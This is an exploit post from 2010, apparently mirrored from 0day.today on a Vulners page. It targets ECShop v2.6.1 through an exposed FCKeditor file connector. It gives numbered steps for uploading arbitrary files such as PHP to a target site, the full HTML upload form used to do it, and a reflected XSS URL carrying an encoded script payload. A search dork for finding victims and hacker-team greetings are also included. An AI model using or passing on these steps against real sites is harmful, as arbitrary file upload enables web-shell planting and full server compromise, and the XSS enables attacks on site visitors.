Vulners
Lucene search
ECShop v2.6.1 (FCKeditor Remote Upload File / XSS) Exploit
==========================================================
ECShop v2.6.1 (FCKeditor Remote Upload File / XSS) Exploit
==========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ####################################### 1
0 I'm indoushka member from Inj3ct0r Team 1
1 ####################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Vendor: http://www.ecshop.com/
# Date: 2010-05-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Home : www.sec4ever.com
# Bug : Remote Upload File Exploit / XSS
# Tested on : windows SP2 Franзais V.(Pnx2 2.0)
# Dork : Powered By Alegro Cart
# Exploit By indoushka
1 -
[~] 1.Save code html format
[~] 2.Search Target.com
[~] 3.Edit and replace & Target
[~] 4.Save Html Page
[~] 5.Open Page Html (Edite Source)
[~] 6.Set Format PHP
[~] 7.Choose File & Upload
[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)
[~] 9.Target.com/images/uploads/File/File Name
2 - code html format
<head>
<title>FCKeditor - Connectors Tests</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script type="text/javascript">
// Automatically detect the correct document.domain (#1919).
(function()
{
var d = document.domain ;
while ( true )
{
// Test if we can access a parent property.
try
{
var test = window.opener.document.domain ;
break ;
}
catch( e ) {}
// Remove a domain part: www.mytest.example.com => mytest.example.com => example.com ...
d = d.replace( /.*?(?:\.|$)/, '' ) ;
if ( d.length == 0 )
break ; // It was not able to detect the domain.
try
{
document.domain = d ;
}
catch (e)
{
break ;
}
}
})() ;
function BuildBaseUrl( command )
{
var sUrl =
document.getElementById('cmbConnector').value +
'?Command=' + command +
'&Type=' + document.getElementById('cmbType').value +
'&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ;
return sUrl ;
}
function SetFrameUrl( url )
{
document.getElementById('eRunningFrame').src = url ;
document.getElementById('eUrl').innerHTML = url ;
}
function GetFolders()
{
SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;
return false ;
}
function GetFoldersAndFiles()
{
SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;
return false ;
}
function CreateFolder()
{
var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;
if ( ! sFolder )
return false ;
var sUrl = BuildBaseUrl( 'CreateFolder' ) ;
sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;
SetFrameUrl( sUrl ) ;
return false ;
}
function OnUploadCompleted( errorNumber, fileName )
{
switch ( errorNumber )
{
case 0 :
alert( 'File uploaded with no errors' ) ;
break ;
case 201 :
GetFoldersAndFiles() ;
alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
break ;
case 202 :
alert( 'Invalid file' ) ;
break ;
default :
alert( 'Error on file upload. Error number: ' + errorNumber ) ;
break ;
}
}
this.frames.frmUpload = this ;
function SetAction()
{
var sUrl = BuildBaseUrl( 'FileUpload' ) ;
document.getElementById('eUrl').innerHTML = sUrl ;
document.getElementById('frmUpload').action = sUrl ;
}
</script>
</head>
<body>
<table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0">
<tr>
<td>
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
Connector:<br />
<select id="cmbConnector" name="cmbConnector">
<option value="asp/connector.asp" selected="selected">ASP</option>
<option value="aspx/connector.aspx">ASP.Net</option>
<option value="cfm/connector.cfm">ColdFusion</option>
<option value="lasso/connector.lasso">Lasso</option>
<option value="perl/connector.cgi">Perl</option>
<option value="php/connector.php">PHP</option>
<option value="py/connector.py">Python</option>
</select>
</td>
<td>
&nbps;&nbps;&nbps;</td>
<td>
Current Folder<br />
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
<td>
&nbps;&nbps;&nbps;</td>
<td>
Resource Type<br />
<select id="cmbType" name="cmbType">
<option value="File" selected="selected">File</option>
<option value="Image">Image</option>
<option value="Flash">Flash</option>
<option value="Media">Media</option>
<option value="Invalid">Invalid Type (for testing)</option>
</select>
</td>
</tr>
</table>
<br />
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td valign="top">
<a href="#" onclick="GetFolders();">Get Folders</a></td>
<td>
&nbps;&nbps;&nbps;</td>
<td valign="top">
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
<td>
&nbps;&nbps;&nbps;</td>
<td valign="top">
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
<td>
&nbps;&nbps;&nbps;</td>
<td valign="top">
<form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data">
File Upload<br />
<input id="txtFileUpload" type="file" name="NewFile" />
<input type="submit" value="Upload" onclick="SetAction();" />
</form>
</td>
</tr>
</table>
<br />
URL: <span id="eUrl"></span>
</td>
</tr>
<tr>
<td height="100%" valign="top">
<iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%"
height="100%"></iframe>
</td>
</tr>
</table>
</body>
</html>
2 - http://localhost:8080/search.php?encode=YToxMzp7czo4OiJjYXRlZ29yeSI7czoxOiIwIjtzOjg6ImtleXdvcmRzIjtzOjEyOiLmkanmiZjnvZfmi4kiO3M6NToiaW50cm8iO3M6Mzc6IjE%2bIj48U2NSaVB0IA0KPmFsZXJ0KDQyNTI1KTs8L1NjUmlQdD4iO3M6NToiYnJhbmQiO3M6MToiMCI7czo0OiJzb3J0IjtzOjg6Imdvb2RzX2lkIjtzOjU6Im9yZGVyIjtzOjQ6IkRFU0MiO3M6OToibWluX3ByaWNlIjtzOjE6IjAiO3M6OToibWF4X3ByaWNlIjtzOjE6IjAiO3M6NjoiYWN0aW9uIjtzOjE6IjEiO3M6MTA6Imdvb2RzX3R5cGUiO3M6MToiMCI7czo1OiJzY19kcyI7czoxOiIwIjtzOjQ6InBhZ2UiO3M6MToiMiI7czoxODoic2VhcmNoX2VuY29kZV90aW1lIjtpOjEyNzYwODcyODY7fQ==
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
---------------------------------------------------------------------------------------------------------------------------------
# 0day.today [2018-01-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Aug 2010 00:00Current
7.1High risk
Vulners AI Score7.1